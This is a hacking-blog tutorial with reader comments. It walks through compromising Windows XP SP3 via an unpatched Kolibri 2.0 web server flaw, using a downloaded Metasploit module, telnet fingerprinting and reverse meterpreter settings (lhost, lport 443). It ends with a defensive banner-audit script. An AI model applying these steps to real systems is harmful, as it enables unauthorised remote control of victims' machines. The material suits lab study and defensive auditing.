Hacking Windows XP SP3 via Kolibri Web Server 2.0 (Zeroday)

Type : Tutorial

Level : Easy

Attacker O.S : Backtrack 5 R1

Victim O.S : Windows XP SP3

Tested Vulnerable Application : Kolibri 2.0

Exploit Credit : mr_me, The_Leader

Another zero-day exploit has been found in Kolibri HTTP Web Server. The exploit was actually written as a Metasploit Framework module on 2011-08-03, but so far there has been no fix or update from the Kolibri developer.

Requirements :

1. Metasploit Framework

2. Kolibri HTTP Server 2.0(download below)

Download from Mediafire.com

3. Kolibri HTTP exploit(download link)

Mediafire.com

Step By Step :

Attacker IP address : 192.168.8.93

Victim IP address : 192.168.8.94

1. Download the kolibri_http.rb exploit from the link above. For testing purposes I've also included the link to download the vulnerable Kolibri web server 2.0 so you can try it in your own lab.

Copy kolibri_http.rb to the following folder (I'm using Backtrack 5 R1):

/pentest/exploit/framework/modules/exploit/windows/http

2. To determine which type of server is running, we can do a simple fingerprint by telnetting to the remote host on the specified port. In this case the victim's Kolibri HTTP server runs on port 8080, whereas a web server usually runs on port 80.

telnet    192.168.8.94      8080
               ^             ^
        remote ip address   port

3. Next, let's prepare to exploit the vulnerable Kolibri web server by choosing the exploit we added in step 1. In this exploit I'm using the meterpreter payload.

4. Set the options needed to perform our exploit. To view all the available options for this exploit + payload, just run the show options command.

Information :

set rhost 192.168.8.94 --> sets the target IP address

set rport 8080 --> sets the target port on which the Kolibri web server runs

set lhost 192.168.8.93 --> our local IP address, which receives the reverse connection from the victim

set lport 443 --> the local port that handles the reverse connection from the victim

5. Once everything is set up correctly, let's run the exploit using the exploit command and see whether it succeeds.

pWn3D!!

Countermeasures :

1. As of writing this tutorial (2011-10-21), the Kolibri web server still has no update, a.k.a. the exploit status is still zero-day.
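With no fixed release to install, the remaining countermeasure is to find every instance and keep it off shared networks. The following is an added example, not part of the original tutorial or the Metasploit module: it repeats the banner check from step 2 across a list of your own hosts and reports those running the server. The `kolibri` marker, the function names and the sample responses are assumptions constructed for illustration.

```python
import socket

# Assumption: the page does not show the banner text; "kolibri" is a
# placeholder marker to adjust to what your own lab instance returns.
BANNER_MARKER = "kolibri"

def server_header(raw):
    """Return the Server header value from a raw HTTP response, or None."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    for line in head.split("\r\n")[1:]:          # skip the status line
        name, sep, value = line.partition(":")
        if sep and name.strip().lower() == "server":
            return value.strip()
    return None

def grab_banner(host, port, timeout=3.0):
    """Do over a socket what step 2 does by hand with telnet."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(f"HEAD / HTTP/1.0\r\nHost: {host}\r\n\r\n".encode())
        data = b""
        while b"\r\n\r\n" not in data and len(data) < 8192:
            chunk = s.recv(1024)
            if not chunk:
                break
            data += chunk
    return data

def audit(inventory, fetch=grab_banner):
    """Return (host, port, banner) for every listed host showing the marker."""
    findings = []
    for host, port in inventory:
        try:
            banner = server_header(fetch(host, port))
        except OSError:                          # closed port, timeout, unreachable
            continue
        if banner and BANNER_MARKER in banner.lower():
            findings.append((host, port, banner))
    return findings

# Constructed sample responses (not captured from a real server); lab addresses.
SAMPLE = {
    ("192.168.8.94", 8080): b"HTTP/1.1 200 OK\r\nServer: kolibri-2.0\r\n\r\n",
    ("192.168.8.93", 80): b"HTTP/1.1 200 OK\r\nServer: Apache\r\n\r\n",
}
def sample_fetch(host, port):
    if (host, port) not in SAMPLE:
        raise ConnectionRefusedError(f"{host}:{port} closed")
    return SAMPLE[(host, port)]

if __name__ == "__main__":
    print(audit(list(SAMPLE) + [("192.168.8.95", 8080)], sample_fetch))
```

Any host the audit reports should have the server bound to the loopback address or firewalled from the rest of the LAN.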

Hope it's useful 🙂

Blogger at hacking-tutorial.com. Love PHP, offensive security and web. Contact him at me[-at-]vishnuvalentino.com

  • Matt Andreko

    Vishnu,
    Instead of copying your exploit into:
    /pentest/exploit/framework/modules/exploit/windows/http
    You should copy it into:
    ~/.msf4/modules/exploits/windows/http
     

    • v4L

      #Matt
      Hmm…but that’s what I’m doing…usually the .msf4 folder was for fileformat exploit generated file.

  • jeet jain

    Hi bro, I tested it on Windows 7 but it won't work. I ran the server on Windows 7 and found it not working. Should I use an XP box, and will only XP Service Pack 3 work, or can I try any XP box? Please reply soon.

    • v4L

      #jeetjain
      I haven’t tried it on Windows 7; if you have tried it, maybe it won’t work.

  • Matt Andreko

    It does not work in Windows 7. It will only work in XP SP3 or Windows 2003 SP2, per http://www.metasploit.com/modules/exploit/windows/http/kolibri_http
    Windows 7 has DEP and ASLR, which help prevent exploitation. There's more work to be done on the Metasploit module to get it past those, if it's possible.

    • v4L

      #Matt
      Thanks for explanation 🙂

  • jeet jain

    Thanks Matt Andreko bro

  • Hi,
    As the author of Kolibri WebServer, let me clarify that Kolibri WS is not intended for any production use or any use on a publicly available address. It is only a development server for easy testing of PHP/web applications locally; it does not scale, and it is not secure, as it is not intended to be secure or scalable.

    • v4L

      #Fedja S
      Sure, I’ll deliver your message. But by the way, even if it was not meant for public or production use, what if I run your web server for development/easy testing on a Local Area Network inside my campus that has more than a thousand users on it?